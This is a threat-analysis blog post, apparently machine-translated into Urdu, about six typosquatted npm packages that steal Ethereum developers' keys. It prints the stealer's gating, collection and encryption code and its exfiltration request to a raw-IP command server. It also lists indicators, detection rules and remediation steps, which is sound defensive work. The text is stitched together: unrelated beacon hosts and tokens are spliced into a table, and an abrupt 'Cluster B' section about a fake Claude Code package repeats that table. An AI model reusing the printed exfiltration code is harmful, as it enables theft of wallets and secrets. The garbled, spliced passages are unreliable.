EVMDeFi npm Typosquatting Attack Steals Developer Keys

EVM/DeFi npm Typosquatting Attack Steals Developer Keys

TL؛ ڈاکٹر

6 مئی 2026 کو، ایک واحد این پی ایم پبلشر، namikazesarada010206ایتھریم، سولیڈیٹی، اور ڈی فائی ڈویلپر ماحولیاتی نظام کو نشانہ بنانے والے چھ نقصان دہ پیکجوں کو آگے بڑھایا۔

پیکجز، viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils، اور web3-utils-core, مقبول Web3 ٹولنگ کے لیے مددگار لائبریریوں کی طرح نظر آنے کے لیے ڈیزائن کیے گئے قابل فہم ناموں کا استعمال کیا۔

تمام چھ پیکیجز ایک جیسے تھے۔ telemetry.js فائل فائل SHA-256 کے ساتھ کلسٹر میں بائٹ ایک جیسی تھی:

ان شاء 256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

میلویئر انسٹال کے وقت پر عمل نہیں کرتا ہے۔ نہیں ہے preinstall or postinstall ہک اس کے بجائے، جب پیکج درآمد کیا جاتا ہے تو یہ چالو ہوجاتا ہے۔ require().

یہ تفصیل اہم ہے۔

امپلانٹ اس وقت تک انتظار کرتا ہے جب تک کہ کوئی ڈویلپر اصل میں پیکیج استعمال نہ کرے۔ پھر یہ چیک کرتا ہے کہ آیا ورک سٹیشن ایک حقیقی Ethereum / Solidity Development Environment کی طرح لگتا ہے۔ یہ کیمیا یا انفورا کیز، پرائیویٹ کیز، میمونکس، ڈیپلائر کیز، یا مقامی فاؤنڈری ڈائرکٹری تلاش کرتا ہے۔

اگر میزبان سے میل کھاتا ہے تو، چوری کرنے والا SSH نجی چابیاں، فاؤنڈری / گیتھ / براؤنی والیٹ کی اسٹورز، .env* فائلیں، اور حساس ماحول کے متغیرات۔ یہ ہارڈ کوڈ شدہ پاسفریز کا استعمال کرتے ہوئے AES-256-GCM کے ساتھ بنڈل کو خفیہ کرتا ہے اور TLS تصدیق کو غیر فعال کرنے کے ساتھ اسے خام IPv4 C2 اختتامی نقطہ پر نکال دیتا ہے۔

Xygeni کے Malware Early Warning (MEW) سسٹم نے تمام چھ پیکجوں کو نقصان دہ ہونے کی تصدیق کی۔ این پی ایم رجسٹری ٹیک ڈاؤن رپورٹ بنڈل زیر التواء ہے۔

کلسٹر: چھ پیکیجز، ایک پبلیشر

پبلشر کا اکاؤنٹ namikazesarada010206 غیر تصدیق شدہ Gmail ایڈریس سے منسلک تھا۔ namikazesarada010206@gmail.com.

یہ مہم 6 مئی 2026 کو ایک دن کی اشاعت کے طور پر ظاہر ہوئی۔ تمام چھ پیکجوں کو اس طرح ورژن بنایا گیا تھا۔ 1.0.0، صفر رن ٹائم انحصار تھا، اور صرف تین فائلیں بھیجیں:

package.json index.js telemetry.js

انہوں نے اسی ماخذ ذخیرہ کا بھی اعلان کیا:

https://github.com/harunosakura030303-maker/evmchain-config

پہلے تین پیکجز کو پہلی اشاعت پر MEW سکینرز نے پکڑ لیا تھا۔ بقیہ تینوں کو پبلشر کے این پی ایم پروفائل کے تجزیہ کار کے جائزے کے بعد زبردستی جھنڈا لگا دیا گیا۔ ایک بار ایک ہی بائٹ ایک جیسی telemetry.js کلسٹر میں تصدیق کی گئی تھی، وہ مستقل مزاجی سے بدنیتی کے طور پر بند کردیئے گئے تھے۔

پیکج ورژن npm شائع ہوا۔ MEW ٹکٹ فیصلہ
viem-core 1.0.0 2026-05-06 01:38:44Z 51049 # مضر
viem-utils-core 1.0.0 2026-05-06 51050 # مضر
hardhat-core-utils 1.0.0 2026-05-06 51051 # مضر
evm-utils 1.0.0 2026-05-06 51069 # بدنیتی پر مبنی، مستقل مزاجی سے
فاؤنڈری کے استعمال 1.0.0 2026-05-06 51071 # بدنیتی پر مبنی، مستقل مزاجی سے
web3-utils-core 1.0.0 2026-05-06 51070 # بدنیتی پر مبنی، مستقل مزاجی سے

نام دینے کی حکمت عملی سیدھی مگر موثر ہے۔

یہ پیکجز بالکل اپ اسٹریم ناموں کی نقالی نہیں کرتے ہیں۔ اس کے بجائے، وہ قابل فہم "افادیت" کے لاحقے استعمال کرتے ہیں جیسے -core, -utils، اور -utils-core. اس سے وہ ساتھی لائبریریوں کی طرح نظر آتے ہیں جو ایک ڈویلپر Web3 ٹولنگ کے قریب دیکھنے کی توقع کر سکتا ہے۔

بدنیتی پر مبنی پیکیج جائز ہدف
viem-core viem، ایک مشہور Ethereum TypeScript کلائنٹ
viem-utils-core viem
hardhat-core-utils hardhat، ایک مرکزی دھارے کی سالیڈیٹی ترقی کا ماحول
evm-utils عام ای وی ایم ٹولنگ نام کی جگہ
فاؤنڈری کے استعمال فاؤنڈری، ایک سالیڈیٹی ٹول چین
web3-utils-core web3-utils، Web3.js مددگار

یہ "ضمنی پیکیج" پیٹرن ہے: "میں اصلی پیکیج نہیں ہوں،" بلکہ "میں حقیقی پیکیج کے ارد گرد ایک معقول مددگار کی طرح لگتا ہوں۔"

DeFi ڈویلپرز کے لیے تیزی سے آگے بڑھ رہے ہیں، یہ خطرہ پیدا کرنے کے لیے کافی ہے۔

جب پیکج درآمد کیا جاتا ہے تو کیا ہوتا ہے۔

حملے کا سلسلہ چھوٹا، جان بوجھ کر، اور کرپٹو ڈیولپمنٹ ماحول پر مرکوز ہے۔

کوئی تنصیب ہک نہیں ہے. اس کے بجائے، ہر پیکج میں ایک شامل ہوتا ہے۔ index.js جو سٹب فعالیت کو برآمد کرتا ہے اور پھر بدنیتی پر مبنی ٹیلی میٹری ماڈیول لوڈ کرتا ہے۔

require('./telemetry').init();

اس کا مطلب ہے کہ میلویئر پہلی درآمد پر چالو ہو جاتا ہے۔

یہ حملہ آور کے لیے عملی طور پر مفید ہے۔ بہت سے اسکینرز اور سینڈ باکسز انسٹال کے وقت کے رویے پر توجہ مرکوز کرتے ہیں۔ یہ پیکج اس وقت تک انتظار کرتا ہے جب تک کہ اسے کسی ڈویلپر، بلڈ اسکرپٹ، ٹیسٹ سویٹ، یا رن ٹائم پاتھ کے ذریعے استعمال نہ کیا جائے۔

ایکٹیویشن گیٹ: صرف اصلی Web3 ڈویلپر ورک سٹیشنوں پر فائر

امپلانٹ کا سب سے اہم حصہ ایکٹیویشن گیٹ ہے۔

میلویئر ماحولیاتی متغیرات کی جانچ کرتا ہے جو عام طور پر Ethereum / Solidity ڈویلپر مشینوں پر پائے جاتے ہیں:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

یہ یہ بھی چیک کرتا ہے کہ آیا فاؤنڈری نصب نظر آتی ہے:

fs.existsSync(path.join(os.homedir(), '.foundry'))

اگر کوئی بھی شرط درست نہیں ہے تو، فنکشن واپس آتا ہے اور کچھ نہیں کرتا ہے۔

یہ عام تجزیہ کے ماحول میں پیکیج کو پرسکون بناتا ہے۔ فاؤنڈری، کیمیا کیز، انفورا کیز، پرائیویٹ کیز، یا یادداشت کے بغیر ایک سینڈ باکس ایک بے ضرر نظر آنے والی درآمد دیکھ سکتا ہے۔

مماثل میزبان پر، میلویئر جمع کرنے سے پہلے 60 سے 90 سیکنڈ تک انتظار کرتا ہے:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

تاخیر درآمد اور اخراج کے درمیان واضح ارتباط کو کم کرتی ہے۔ دی .unref() کال میزبان کے عمل کو عام طور پر باہر نکلنے دیتا ہے اگر پیکج کو قلیل المدت اسکرپٹ میں درآمد کیا گیا ہو۔

یہ شور مچانے اور پکڑنے والا سلوک نہیں ہے۔ یہ ایک ٹارگٹڈ اسٹیلر ہے جسے چلانے سے بچنے کے لیے ڈیزائن کیا گیا ہے جب تک کہ ڈویلپر کا ماحول چوری کرنے کے قابل نہ ہو۔

چوری کرنے والا کیا جمع کرتا ہے۔

ایکٹیویشن گیٹ گزر جانے کے بعد، میلویئر ان ذرائع سے جمع کرتا ہے جو Web3 کی ترقی میں سب سے زیادہ اہمیت رکھتے ہیں: پرائیویٹ کیز، والیٹ کی اسٹورز، تعیناتی اسناد، کلاؤڈ سیکرٹس، npm ٹوکنز، اور مقامی پروجیکٹ کنفیگریشن۔

ماخذ کیا جمع کیا جاتا ہے
process.env کوئی بھی متغیر مماثلت /TOKEN|SECRET|KEY|PASS|AUTH|private|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* فائلیں جن میں پرائیویٹ کلید یا شروع اوپنش شامل ہیں، بشمول مکمل فائل کا مواد
~/.foundry/keystores/* فاؤنڈری والیٹ کی اسٹور فائلیں۔
~/.ethereum/keystore/* گیتھ والیٹ کی اسٹور فائلیں۔
~/.brownie/accounts/* براؤنی والیٹ کی اسٹور فائلیں۔
${cwd}/.env مکمل فائل کا مواد
${cwd}/.env.local مکمل فائل کا مواد
${cwd}/.env.production مکمل فائل کا مواد
${cwd}/.env.development مکمل فائل کا مواد
os.hostname() میزبان میٹا ڈیٹا
crypto.randomUUID() شکار/سیشن شناخت کنندہ
Date.now() جمع کرنے کا ٹائم اسٹیمپ
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA ٹوکن یہ ہیں:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

ہم اس بات کی تصدیق نہیں کر سکے کہ آیا ٹیلی میٹری آپریٹر کا اپنا اینالیٹکس تھا یا الگ سے منیٹائز شدہ چینل۔ ہم نے جن دونوں نمونوں کی جانچ کی ہے ان میں ATTA ٹوکن ایک جیسے ہیں۔

کلسٹر بی: ہیبائی

claude.hk OAuth فشنگ + ANTHROPIC_BASE_URL ہائی جیک

1 اپریل کا نمونہ مہم کا سب سے پہلے والا حصہ ہے۔

heibai:2.1.88-claude.hk-4 کی طرف سے شائع کیا گیا تھا wuguoqiangvip287 جون 2025 کو ایک اکاؤنٹ بنایا گیا۔ پیکیج نے واضح طور پر خود کو جائز کے خلاف ورژن بنایا 2.1.88 انتھروپک رہائی۔

یہ CA-cert MITM سے پریشان نہیں ہے۔ اس کے بجائے، یہ OAuth اینڈ پوائنٹ کے بارے میں صارف سے جھوٹ بولتا ہے۔

لیک شدہ کلاڈ کوڈ ماخذ کے اوپر بدنیتی پر مبنی اضافے میں شامل ہیں:

ماخذ کیا جمع کیا جاتا ہے
process.env کوئی بھی متغیر مماثلت /TOKEN|SECRET|KEY|PASS|AUTH|private|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* فائلیں جن میں پرائیویٹ کلید یا شروع اوپنش شامل ہیں، بشمول مکمل فائل کا مواد
~/.foundry/keystores/* فاؤنڈری والیٹ کی اسٹور فائلیں۔
~/.ethereum/keystore/* گیتھ والیٹ کی اسٹور فائلیں۔
~/.brownie/accounts/* براؤنی والیٹ کی اسٹور فائلیں۔
${cwd}/.env مکمل فائل کا مواد
${cwd}/.env.local مکمل فائل کا مواد
${cwd}/.env.production مکمل فائل کا مواد
${cwd}/.env.development مکمل فائل کا مواد
os.hostname() میزبان میٹا ڈیٹا
crypto.randomUUID() شکار/سیشن شناخت کنندہ
Date.now() جمع کرنے کا ٹائم اسٹیمپ

ہدف کی فہرست انتہائی مخصوص ہے۔ یہ عام براؤزر کی چوری یا وسیع اسناد کی سکریپنگ نہیں ہے۔ اس کا مقصد ان ڈویلپرز کے لیے ہے جو Ethereum ایپلی کیشنز کی تعمیر، جانچ، تعیناتی، یا کام کرتے ہیں۔

فاؤنڈری، گیتھ، اور براؤنی کی اسٹورز کی شمولیت خاص طور پر اہم ہے۔ یہ فائلیں بٹوے یا تعیناتی شناخت تک براہ راست رسائی کی نمائندگی کر سکتی ہیں۔ اگر حملہ آور ان کو پاس ورڈز، یادداشتوں یا ماحول کے رازوں کے ساتھ جوڑ سکتا ہے، تو وہ فنڈز منتقل کرنے، تعینات کرنے والوں کی نقالی کرنے، یا سمارٹ کنٹریکٹ آپریشنز پر سمجھوتہ کرنے کے قابل ہو سکتے ہیں۔

Exfiltration سے پہلے خفیہ کاری

میلویئر جمع کردہ ڈیٹا کو بھیجنے سے پہلے اسے خفیہ کرتا ہے۔

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

ہارڈ کوڈ پاسفریز ہے:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

حتمی پے لوڈ JSON کے طور پر لپیٹ دیا گیا ہے:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

خفیہ کاری میلویئر کو خود سے زیادہ ترقی یافتہ نہیں بناتی ہے۔ تاہم، یہ نیٹ ورک کا معائنہ مشکل بناتا ہے۔ باہر نکلنے والے محافظ کو JSON پے لوڈ نظر آئے گا، لیکن چوری شدہ چابیاں، والیٹ فائلیں یا .env ہارڈ کوڈ پاسفریز اور ڈکرپشن منطق کے بغیر مواد۔

ایک خام IPv4 C2 کو نکالنا

اخراج کا راستہ سخت کوڈڈ ہے:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

میلویئر ڈیٹا بھیجتا ہے:

https://76.13.37.80:8443/api/v1/telemetry

دو تفصیلات سامنے آتی ہیں۔

سب سے پہلے، C2 ڈومین کے بجائے ایک خام IPv4 ایڈریس ہے۔ یہ ڈومین رجسٹریشن کی ضرورت کو دور کرتا ہے اور ڈومین پر مبنی کچھ کھوجوں سے بچتا ہے۔

دوسرا، TLS تصدیق اس کے ساتھ غیر فعال ہے:

rejectUnauthorized: false

یہ میلویئر کو کسی بھی سرٹیفکیٹ کو قبول کرنے کی اجازت دیتا ہے، بشمول خود دستخط شدہ سرٹیفکیٹس۔ دوسرے لفظوں میں، حملہ آور کو درست عوامی سرٹیفکیٹ کی ضرورت کے بغیر انکرپٹڈ ٹرانسپورٹ مل جاتی ہے۔

کوئی دوبارہ کوشش کرنے کی کوئی منطق نہیں ہے اور کوئی فال بیک ہوسٹ نہیں ہے۔ خامیاں خاموشی سے نگل جاتی ہیں۔ اگر C2 آف لائن ہے یا ناقابل رسائی ہے تو یہ پیکج کو خاموش رکھتا ہے۔

یہ مہم کیوں اہمیت رکھتی ہے۔

زیادہ تر بدنیتی پر مبنی این پی ایم پیکجز جن کا مقصد ڈیولپرز کی وسیع اسناد کا پیچھا کرتے ہیں: این پی ایم ٹوکنز، اے ڈبلیو ایس کیز، گٹ ہب ٹوکنز، یا .npmrc فائلوں.

یہ مہم ہدف کو کم کرتی ہے۔

یہ نشانیاں تلاش کرتا ہے کہ مشین Ethereum یا Solidity ڈویلپر سے تعلق رکھتی ہے۔ پھر یہ بالکل ان اثاثوں کو کھینچتا ہے جو اس ماحول میں اہمیت رکھتے ہیں: والیٹ کی اسٹورز، پرائیویٹ کیز، یادداشت کی چابیاں، ڈیپلائر کیز، .env فائلیں، اور SSH کیز۔

یہ مہم کو Web3 ٹیموں کے لیے عام npm اسٹیلر سے زیادہ خطرناک بنا دیتا ہے۔

ایک کامیاب انفیکشن بے نقاب ہو سکتا ہے:

  • تعیناتی بٹوے
  • سمارٹ کنٹریکٹ ایڈمن کیز
  • RPC فراہم کنندہ کیز
  • کلاؤڈ تعیناتی اسناد
  • npm پبلشنگ ٹوکن
  • ڈویلپر یا تعمیراتی ڈھانچے تک SSH رسائی
  • پروجیکٹ کے راز اس میں محفوظ ہیں۔ .env فائلوں
  • فاؤنڈری، گیتھ، یا براونی کے لیے والیٹ کی اسٹورز

پیکیج کے نام بھی واضح سوشل انجینئرنگ کو ظاہر کرتے ہیں۔ وہ واقف ٹول ناموں کے ذریعے Web3 ڈویلپر ماحولیاتی نظام کو نشانہ بناتے ہیں: viem, hardhat, foundry, evm، اور web3.

اداکار کو حقیقی منصوبوں پر سمجھوتہ کرنے کی ضرورت نہیں ہے۔ انہیں انسٹال کرنے کے لیے صرف ایک ڈویلپر کی ضرورت ہوتی ہے جو ایک معقول ساتھی پیکج کی طرح لگتا ہے۔

سمجھوتہ اور کھوج کے اشارے

پیکجز اور پبلشر
فیلڈ قدر
این پی ایم پبلشر namikazesarada010206
پبلیشر کا ای میل namikazesarada010206@gmail.com
ای میل کی تصدیق ہو گئی۔ نہیں
SCM تصدیق نہیں
شہرت کا سکور 1.0
پیکجوں کے viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
ورژن تمام 1.0.0
ماخذ ذخیرہ https://github.com/harunosakura030303-maker/evmchain-config
تصدیق شدہ بدنیتی پر مبنی تمام چھ پیکیجز
نیٹ ورک
قسم قدر
C2 اختتامی نقطہ https://76.13.37.80:8443/api/v1/telemetry
C2 آئی پی 76.13.37.80
C2 پورٹ 8443/ٹی سی پی
TLS سلوک rejectUnauthorized : جھوٹا ۔
پے لوڈ سکیما {"v":2,"iv": "d": "t": }
فائلیں اور ہیش
قسم قدر
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
پیکیج لے آؤٹ package.json، index.js، telemetry.js
فائل کی گنتی 3
لگ بھگ کل سائز 3.4 KB

ایکٹیویشن سگنلز

میلویئر ان ماحولیاتی متغیرات کی جانچ کرتا ہے:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

یہ بھی چیک کرتا ہے:

~/.foundry/

ھدف بنائے گئے میزبان راستے

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

مجموعہ Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

کھوج کے نوٹس

مکمل رویے کے تجزیے کی ضرورت کے بغیر کئی قواعد اس مہم کو پکڑتے ہیں۔

سب سے پہلے، چھ بدنیتی پر مبنی پیکیج کے ناموں کے لیے لاک فائلز کو اسکین کریں:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

میں کوئی بھی میچ package-lock.json, yarn.lock, pnpm-lock.yaml، یا node_modules تاریخ کو ایک سنگین واقعہ سمجھنا چاہیے۔

دوسرا، Node.js پرسز کو پڑھنے والی والیٹ کی اسٹور کے راستوں کے لیے مانیٹر:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

مددگار انحصار کے طور پر درآمد کردہ پیکیج کے لیے یہ شاذ و نادر ہی جائز سلوک ہے۔ یہ خاص طور پر مشکوک ہوتا ہے جب اس کے بعد آؤٹ باؤنڈ نیٹ ورک کی سرگرمی ہوتی ہے۔

تیسرا، HTTPS کنکشن کو بلاک یا الرٹ کریں:

76.13.37.80:8443

خاص طور پر جب درخواست کا راستہ یہ ہے:

/api/v1/telemetry

چوتھا، npm پیکجوں کی تلاش جو ان خصلتوں کو یکجا کرتے ہیں:

  • تازہ یا کم شہرت والا پبلشر
  • غیر تصدیق شدہ Gmail اکاؤنٹ
  • Web3 ملحقہ پیکیج کا نام
  • کوئی معنی خیز ذخیرہ کی تاریخ نہیں۔
  • چھوٹے پیکیج کی ترتیب
  • index.js جو ٹیلی میٹری یا مددگار فائل لوڈ کرتا ہے۔
  • کوئی رن ٹائم انحصار نہیں ہے۔
  • حساس ماحول متغیر مجموعہ
  • والیٹ کی اسٹور تک رسائی

یہ پیٹرن ایک واحد IOC سے زیادہ کارآمد ہے کیونکہ اگلا پیکج IP ایڈریس کو تبدیل کر سکتا ہے لیکن ہدف سازی کی ایک ہی منطق کو برقرار رکھتا ہے۔

کمپرومائز رسپانس چیک لسٹ

اگر کسی ڈویلپر نے چھ پیکجوں میں سے ایک کا استعمال کیا اور ان کا ماحول ایکٹیویشن گیٹ سے مماثل ہے، تو ورک سٹیشن کو سمجھوتہ کیا گیا ہے۔

اس میں فاؤنڈری انسٹال والی مشینیں، ماحول میں کیمیا یا انفورا کیز، پرائیویٹ کیز، میمونکس، یا ڈیپلائر کیز شامل ہیں۔

تجویز کردہ جواب:

  • میزبان کو نیٹ ورک سے منقطع کریں۔
  • محفوظ کریں۔ node_modulesلاک فائلز، شیل ہسٹری، اور فارنزک کے لیے متعلقہ لاگز۔
  • ہر SSH کی جوڑی کو نیچے گھمائیں۔ ~/.ssh/.
  • ہر کی اسٹور کے نیچے والیٹ کیز کو گھمائیں۔ ~/.foundry, ~/.ethereum، اور ~/.brownie.
  • فنڈز کو تازہ بٹوے میں منتقل کریں۔
  • میں ذخیرہ شدہ ہر راز کو گھمائیں۔ .env* ریپوزٹریوں میں فائلیں جن میں ڈویلپر کام کرتا تھا۔
  • AWS کیز، npm ٹوکنز، ڈیپلائی ٹوکنز، API کیز، پرائیویٹ کیز، سیڈز، اور میمونکس سمیت کلیکشن ریجیکس سے مماثل ماحول کے راز کو گھمائیں۔
  • کلاؤڈ، این پی ایم، گٹ ہب، آر پی سی فراہم کنندہ، اور بلاکچین سرگرمی کا آڈٹ کریں جب سے پیکیج پہلی بار انسٹال ہوا تھا۔
  • دوبارہ استعمال کرنے سے پہلے ورک سٹیشن کی دوبارہ تصویر بنائیں۔

محافظوں کو کیا لے جانا چاہئے

یہ مہم دکھاتی ہے کہ کس طرح npm typosquatting اعلی قدر والے ڈویلپر ماحولیاتی نظام کے ارد گرد تیار ہو رہی ہے۔

اداکار کو مستقل مزاجی کی ضرورت نہیں تھی۔ انہیں ابہام کی ضرورت نہیں تھی۔ انہیں انسٹال ٹائم ایگزیکیوشن کی بھی ضرورت نہیں تھی۔

اس کے بجائے، انہوں نے تین چیزوں پر انحصار کیا:

  • قابل احترام Web3 پیکیج کے نام
  • ایکٹیویشن صرف اصلی کرپٹو ڈویلپمنٹ مشینوں پر
  • فائلوں اور رازوں کی براہ راست چوری جو Ethereum ڈویلپرز کے لیے سب سے اہم ہے۔

یہ مہم کو وسیع اسکیننگ میں کھونا آسان بناتا ہے اور صحیح ماحول میں اترنے پر خطرناک۔

Web3 ٹیموں کے لیے، سبق واضح ہے: انحصار کے ناموں کو اپنے خطرے کے ماڈل کے حصے کے طور پر سمجھیں۔ ایک پیکج جو ایک بے ضرر مددگار کی طرح لگتا ہے اب بھی بٹوے سے سمجھوتہ کرنے کا مختصر ترین راستہ بن سکتا ہے۔

این پی ایم رجسٹری کو اطلاع دی گئی۔ پبلشر اکاؤنٹ اور پیکجز ہٹائے جانے پر ہم اس پوسٹ کو اپ ڈیٹ کریں گے۔

sca-tools-software-composition-analysis-tools
اپنے سافٹ ویئر کے خطرات کو ترجیح دیں، تدارک کریں اور محفوظ کریں۔
اپنا مفت اکاؤنٹ حاصل کریں۔
کوئی کریڈٹ کارڈ کی ضرورت نہیں ہے.

اپنے سافٹ ویئر ڈویلپمنٹ اور ڈیلیوری کو محفوظ بنائیں

Xygeni پروڈکٹ سویٹ کے ساتھ